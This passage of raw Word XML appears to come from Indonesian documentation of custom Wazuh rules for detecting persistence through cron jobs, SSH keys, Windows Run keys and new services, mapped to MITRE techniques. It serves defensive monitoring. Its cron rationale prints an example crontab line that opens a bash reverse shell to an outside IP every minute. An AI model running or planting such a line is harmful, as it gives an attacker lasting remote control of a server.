          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">        : Direktori sistem </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C53030"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>/etc/cron.d/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C53030"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>/etc/cron.daily/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C53030"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>/etc/cron.hourly/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C53030"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>/etc/cron.weekly/</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/var/spool/cron</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">  : Direktori crontab individual milik user (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C53030"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>/var/spool/cron/crontabs/</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/etc/crontab</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">     : File tabel cron utama sistem Linux.</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100200 memonitor modifikasi file konfigurasi cron daemon Linux. Engine Wazuh mendeteksi event ini melalui integrasi File Integrity Monitoring (FIM / Syscheck) dan log audit eksekusi perintah shell. Jika terjadi pembuatan file baru, modifikasi isi, atau penulisan string jadwal tugas pada path direktori cron, rule ini langsung memicu peringatan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penanaman script otomatisasi peretasan (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:i/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Malicious Job Scheduling</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>2. Memastikan seluruh perubahan jadwal tugas sistem diketahui dan tervalidasi oleh tim administrator.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>3. Menyediakan komponen pengenal persistensi bagi skenario serangan multi-tahap.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="40" w:line="276" w:lineRule="auto" w:before="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>D. Alasan Pembuatan &amp; Urgensi Keamanan</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Penjadwal tugas Cron adalah sarana persistensi paling favorit bagi peretas Linux (termasuk botnet Mirai dan malware Crypto-miner seperti XMRig). Penyerang biasanya menambahkan satu baris tersembunyi:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C53030"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>* * * * * root /bin/bash -c "bash -i &gt;&amp; /dev/tcp/198.51.100.23/4444 0&gt;&amp;1"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Perintah ini memastikan bahwa setiap menit, server akan secara otomatis menghubungkan reverse shell ke komputer penyerang. Tanpa Rule 100200, penyerang dapat mempertahankan akses kendali tanpa batas waktu.</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100201 — SSH Authorized Keys or Private Key Modified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id="100201" level="8"&gt;</w:t>
              <w:br/>
              <w:t xml:space="preserve">  &lt;if_group&gt;base_normalized&lt;/if_group&gt;</w:t>
              <w:br/>
              <w:t xml:space="preserve">  &lt;match&gt;\.ssh/authorized_keys|\.ssh/id_rsa&lt;/match&gt;</w:t>
              <w:br/>
              <w:t xml:space="preserve">  &lt;description&gt;PERSIST: SSH authorized_keys or private key modified&lt;/description&gt;</w:t>
              <w:br/>
              <w:t xml:space="preserve">  &lt;group&gt;persistence,ssh_key_persistence,&lt;/group&gt;</w:t>
              <w:br/>
              <w:t xml:space="preserve">  &lt;mitre&gt;</w:t>
              <w:br/>
              <w:t xml:space="preserve">    &lt;id&gt;T1098.004&lt;/id&gt;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100201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Credential Tampering)</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T1098.004 (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:i/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Account Manipulation: SSH Authorized Keys</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\.ssh/authorized_keys</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>: File daftar public key yang diizinkan login tanpa password pada protokol SSH.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">* </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C53030"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>\.ssh/id_rsa</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>: File kunci kriptografi privat SSH pengguna/server.</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100201 mengawasi integritas direktori terpenting dalam infrastruktur otentikasi Linux: folder </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C53030"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>.ssh/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">. Setiap kali terjadi operasi penulisan, penambahan baris, atau penggantian pada file </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C53030"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>authorized_keys</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> atau kunci privat </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C53030"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>id_rsa</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> di direktori home user manapun (termasuk </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C53030"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>/root/.ssh/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">), sistem langsung menetapkan status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Mendeteksi Penanaman Pintu Belakang SSH (*SSH Backdoor Planting*):</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> Mengetahui saat peretas menyuntikkan kunci publik mereka sendiri ke dalam profil pengguna yang sah.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>2. Mendeteksi indikasi pencurian kunci privat server (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:i/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>SSH Private Key Exfiltration</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>) yang dapat digunakan untuk membobol server lain secara lateral.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>3. Menjamin bahwa seluruh akses berbasis kunci kriptografi terkontrol melalui prosedur manajemen identitas resmi.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="40" w:line="276" w:lineRule="auto" w:before="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>D. Alasan Pembuatan &amp; Rasional Forensik</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Menyisipkan public key ke file </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C53030"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>~/.ssh/authorized_keys</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> adalah taktik persistensi paling bersih dan sulit dideteksi (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:i/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>stealthiest persistence</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">). Akses ini kebal terhadap penggantian password akun Linux, tidak memicu kegagalan login brute force, dan tercatat di audit log sebagai login sukses biasa (Rule 5715). Rule 100201 mematahkan teknik ini pada akar masalahnya: yaitu saat file </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C53030"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>authorized_keys</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> pertama kali diubah.</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100202 — Windows Registry Run / RunOnce Key Added or Modified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id="100202" level="8"&gt;</w:t>
              <w:br/>
              <w:t xml:space="preserve">  &lt;if_group&gt;base_normalized&lt;/if_group&gt;</w:t>
              <w:br/>
              <w:t xml:space="preserve">  &lt;match&gt;Software\\Microsoft\\Windows\\CurrentVersion\\Run&lt;/match&gt;</w:t>
              <w:br/>
              <w:t xml:space="preserve">  &lt;description&gt;PERSIST: Windows Registry Run / RunOnce key added or modified&lt;/description&gt;</w:t>
              <w:br/>
              <w:t xml:space="preserve">  &lt;group&gt;persistence,registry_run_keys,&lt;/group&gt;</w:t>
              <w:br/>
              <w:t xml:space="preserve">  &lt;mitre&gt;</w:t>
              <w:br/>
              <w:t xml:space="preserve">    &lt;id&gt;T1547.001&lt;/id&gt;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100202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8</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> (High Severity / Windows Boot Autostart)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T1547.001 (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:i/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder</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r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> Path registri Windows </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C53030"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>Software\Microsoft\Windows\CurrentVersion\Run</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> dan </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C53030"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>RunOnce</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> (baik di bawah </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C53030"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>HKEY_LOCAL_MACHINE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> maupun </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C53030"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>HKEY_CURRENT_USER</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w: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100202 memvalidasi event modifikasi Windows Registry (Sysmon Event ID 12/13 atau Windows Security Event ID 4657). Ketika ada proses yang menambahkan nilai biner eksekusi ke dalam subkey </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C53030"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>Run</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">, sistem operasi Windows akan dipaksa menjalankan program tersebut setiap kali pengguna login. Rule ini mendeteksi penambahan nilai tersebut pada </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="1A202C"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Level 8</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Menghentikan malware persistence pada endpoint Windows (laptop manajemen, workstation, dan server Windows).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>2. Mendeteksi Trojan, Infostealer, dan Backdoor yang berusaha mempertahankan keberadaannya pasca-restart sistem (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:i/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Reboot Survival</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>3. Memberikan audit path file biner yang didaftarkan ke dalam registry autostart.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="40" w:line="276" w:lineRule="auto" w:before="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>D. Alasan Pembuatan &amp; Urgensi Endpoint Security</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Hampir seluruh keluarga malware Windows dari era lawas hingga modern (seperti TrickBot, QakBot, RedLine Stealer) menggunakan registry Run Key karena implementasinya yang sederhana dan dapat dieksekusi tanpa memerlukan hak akses kernel. Rule 100202 memastikan tidak ada satupun program yang dapat mendaftarkan diri secara diam-diam ke dalam siklus booting Windows.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="CBD5E0"/>
        </w:pBdr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="60" w:line="276" w:lineRule="auto" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="2B6CB0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>2.4. RULE ID 100203 — Systemd Service or Windows Service Created for Persistence</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id="100203" level="9"&gt;</w:t>
              <w:br/>
              <w:t xml:space="preserve">  &lt;if_group&gt;base_normalized&lt;/if_group&gt;</w:t>
              <w:br/>
              <w:t xml:space="preserve">  &lt;match&gt;/etc/systemd/system/|sc create|sc.exe create&lt;/match&gt;</w:t>
              <w:br/>
              <w:t xml:space="preserve">  &lt;description&gt;PERSIST: Systemd service or Windows service created for persistence&lt;/description&gt;</w:t>
              <w:br/>
              <w:t xml:space="preserve">  &lt;group&gt;persistence,create_or_modify_system_process,&lt;/group&gt;</w:t>
              <w:br/>
              <w:t xml:space="preserve">  &lt;mitre&gt;</w:t>
              <w:br/>
              <w:t xml:space="preserve">    &lt;id&gt;T1543.002&lt;/id&gt;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100203</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9</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Critical Severity / Kernel Service Creation)</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T1543.002 (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:i/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Create or Modify System Process: Systemd Service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/etc/systemd/system/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>: Path penyimpanan unit file layanan latar belakang Linux (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C53030"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>.service</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">* </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C53030"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>sc create</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> / </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C53030"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>sc.exe create</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>: Perintah utilitas Service Controller Windows untuk mendaftarkan biner executable sebagai background Windows Service.</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100203 mengawasi pembuatan proses layanan permanen pada level kernel/daemon sistem. Layanan latar belakang berjalan dengan hak istimewa superuser (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C53030"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>root</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> pada Linux atau </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C53030"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>NT AUTHORITY\SYSTEM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> pada Windows) bahkan sebelum pengguna melakukan login secara interaktif. Rule ini menetapkan status bahaya kritis: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="1A202C"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Level 9</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penanaman pintu belakang layanan permanen (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:i/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Persistent Daemon Backdoor</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">2. Mencegah penyerang menyamarkan malware sebagai layanan sistem resmi (misalnya mendaftarkan malware dengan nama layanan palsu </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C53030"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>WindowsUpdateService</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> atau </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C53030"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>systemd-network-helper</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="2D3748"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:line="276" w:lineRule="auto"/>
